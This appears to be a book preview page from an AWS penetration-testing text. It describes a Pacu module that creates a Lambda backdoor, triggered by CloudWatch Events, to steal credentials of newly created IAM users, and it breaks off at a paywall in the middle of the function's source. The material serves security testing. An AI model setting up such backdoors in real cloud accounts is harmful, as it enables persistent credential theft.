April 2019
Intermediate to advanced
508 pages
11h 57m
English
The process of creating the backdoor Lambda function, creating the CloudWatch Events rule, and connecting the two would be annoying to do manually every time, so that has been automated and integrated into Pacu for us.
The first Pacu module we will look at is called lambda__backdoor_new_users, and it basically just automates the process of creating a Lambda backdoor that backdoors and exfiltrates credentials for newly created users in the environment. If we look at the source code of the Lambda function that the Pacu module uses, we see the following:
import boto3from botocore.vendored import requestsdef lambda_handler(event,context): if event['detail']['eventName']=='CreateUser': client=boto3.client( ...
Read now
Unlock full access